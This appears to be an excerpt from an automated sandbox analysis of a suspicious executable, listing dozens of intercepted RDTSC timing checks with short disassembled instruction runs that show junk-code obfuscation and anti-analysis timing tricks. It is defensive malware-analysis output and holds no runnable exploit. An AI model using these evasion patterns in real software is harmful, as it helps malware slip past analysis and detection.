Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE443 second address: FBE459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAD4CB7C001h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE5A2 second address: FBE5C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007FAD4CB4B576h 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007FAD4CB4B583h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE6DD second address: FBE6EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE6EA second address: FBE705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007FAD4CB4B576h 0x0000000c jl 00007FAD4CB4B576h 0x00000012 popad 0x00000013 jp 00007FAD4CB4B582h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE705 second address: FBE70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE831 second address: FBE84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B589h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE84E second address: FBE852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE852 second address: FBE85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBE85C second address: FBE879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBEB4B second address: FBEB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBECC4 second address: FBECC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBECC8 second address: FBECD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFCB6 second address: FBFCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FAD4CB7BFF6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FBFCC8 second address: FBFCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FAD4CB4B58Bh 0x0000000b jmp 00007FAD4CB4B57Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC6397 second address: FC639C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC639C second address: FC63B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FAD4CB4B576h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC63B6 second address: FC63BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D58 second address: FC5D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D5E second address: FC5D72 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB7BFF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FAD4CB7C002h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FC5D72 second address: FC5D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FC5D78 second address: FC5DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAD4CB7C009h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD4CB7BFFAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7AFF second address: FD7B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B586h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7B20 second address: FD7B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7659 second address: FD7667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7667 second address: FD76A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FAD4CB7C004h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jng 00007FAD4CB7C00Fh 0x0000001a jmp 00007FAD4CB7C003h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7810 second address: FD781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD781A second address: FD7827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FD7827 second address: FD783D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FAD4CB4B576h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FE3BEA second address: FE3BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FE698C second address: FE69A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FE69A9 second address: FE69AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FE67F9 second address: FE67FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FEF62D second address: FEF631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FEF8E7 second address: FEF8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FEFA09 second address: FEFA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FAD4CB7C007h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB7BFFDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FEFFE9 second address: FEFFF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FAD4CB4B576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF09AE second address: FF09B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF09B4 second address: FF09C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FAD4CB4B588h 0x0000000b jo 00007FAD4CB4B582h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF4472 second address: FF4476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF4476 second address: FF448C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007FAD4CB4B576h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FAD4CB4B576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF448C second address: FF44A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD4CB7BFF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FAD4CB7BFF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF44A3 second address: FF44C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FAD4CB4B586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF44C3 second address: FF44C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF4622 second address: FF4627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF4627 second address: FF466B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C002h 0x00000009 jo 00007FAD4CB7BFF6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jnp 00007FAD4CB7BFF6h 0x00000019 jnl 00007FAD4CB7BFF6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FAD4CB7BFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF466B second address: FF4671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: FF4671 second address: FF468F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAD4CB7C009h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1037D63 second address: 1037D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 103A3B0 second address: 103A3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 10365A3 second address: 10365B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB4B576h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1116649 second address: 111664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1115B97 second address: 1115BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jng 00007FAD4CB4B576h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1115E58 second address: 1115E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007FAD4CB7BFF6h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1115E6C second address: 1115E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1116224 second address: 1116251 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FAD4CB7BFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 js 00007FAD4CB7BFF6h 0x00000016 jmp 00007FAD4CB7C004h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1116394 second address: 1116399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1116399 second address: 11163A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111A882 second address: 111A886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111A886 second address: 111A8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAD4CB7BFFAh 0x00000010 popad 0x00000011 jc 00007FAD4CB7C022h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111A8AB second address: 111A8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111A8AF second address: 111A8B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111D22E second address: 111D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111D232 second address: 111D236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111D236 second address: 111D23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111D23C second address: 111D246 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB7BFFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111D794 second address: 111D79A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111EDB7 second address: 111EDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 111EDC7 second address: 111EDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAD4CB4B589h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 1120BBF second address: 1120BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74300DA second address: 7430119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub esp, 18h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB4B57Dh 0x00000016 add ecx, 133F0056h 0x0000001c jmp 00007FAD4CB4B581h 0x00000021 popfd 0x00000022 mov dx, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430119 second address: 7430135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB7C008h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430135 second address: 7430139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430139 second address: 7430148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430148 second address: 743014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743014C second address: 7430152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430152 second address: 7430236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 2E6Dh 0x00000007 call 00007FAD4CB4B57Ah 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAD4CB4B587h 0x0000001a add esi, 5CB3DC4Eh 0x00000020 jmp 00007FAD4CB4B589h 0x00000025 popfd 0x00000026 call 00007FAD4CB4B580h 0x0000002b pushfd 0x0000002c jmp 00007FAD4CB4B582h 0x00000031 xor esi, 033CE3F8h 0x00000037 jmp 00007FAD4CB4B57Bh 0x0000003c popfd 0x0000003d pop eax 0x0000003e popad 0x0000003f mov ebx, dword ptr [eax+10h] 0x00000042 pushad 0x00000043 mov si, di 0x00000046 mov esi, edi 0x00000048 popad 0x00000049 push eax 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FAD4CB4B586h 0x00000051 adc eax, 14456D88h 0x00000057 jmp 00007FAD4CB4B57Bh 0x0000005c popfd 0x0000005d jmp 00007FAD4CB4B588h 0x00000062 popad 0x00000063 mov dword ptr [esp], esi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 movsx edi, cx 0x0000006c mov cx, FAF5h 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430236 second address: 74302A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB7BFFDh 0x00000009 adc ch, 00000006h 0x0000000c jmp 00007FAD4CB7C001h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, dword ptr [772406ECh] 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAD4CB7C003h 0x00000022 or ah, 0000003Eh 0x00000025 jmp 00007FAD4CB7C009h 0x0000002a popfd 0x0000002b popad 0x0000002c test esi, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAD4CB7BFFDh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74302A9 second address: 7430362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FAD4CB4C286h 0x00000010 jmp 00007FAD4CB4B589h 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAD4CB4B57Ch 0x0000001d add cl, FFFFFFC8h 0x00000020 jmp 00007FAD4CB4B57Bh 0x00000025 popfd 0x00000026 jmp 00007FAD4CB4B588h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, 281DE4D4h 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 jmp 00007FAD4CB4B584h 0x0000003c call dword ptr [77210B60h] 0x00000042 mov eax, 766BE5E0h 0x00000047 ret 0x00000048 jmp 00007FAD4CB4B580h 0x0000004d push 00000044h 0x0000004f jmp 00007FAD4CB4B580h 0x00000054 pop edi 0x00000055 pushad 0x00000056 call 00007FAD4CB4B57Eh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430362 second address: 7430380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAD4CB7C001h 0x0000000a popad 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430380 second address: 7430384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430384 second address: 7430388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 7430388 second address: 743038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 743038E second address: 74303CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C002h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAD4CB7BFFBh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov dh, 89h 0x00000013 popad 0x00000014 push dword ptr [eax] 0x00000016 jmp 00007FAD4CB7BFFAh 0x0000001b mov eax, dword ptr fs:[00000030h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74303CD second address: 74303D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exe RDTSC instruction interceptor: First address: 74303D1 second address: 74303D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
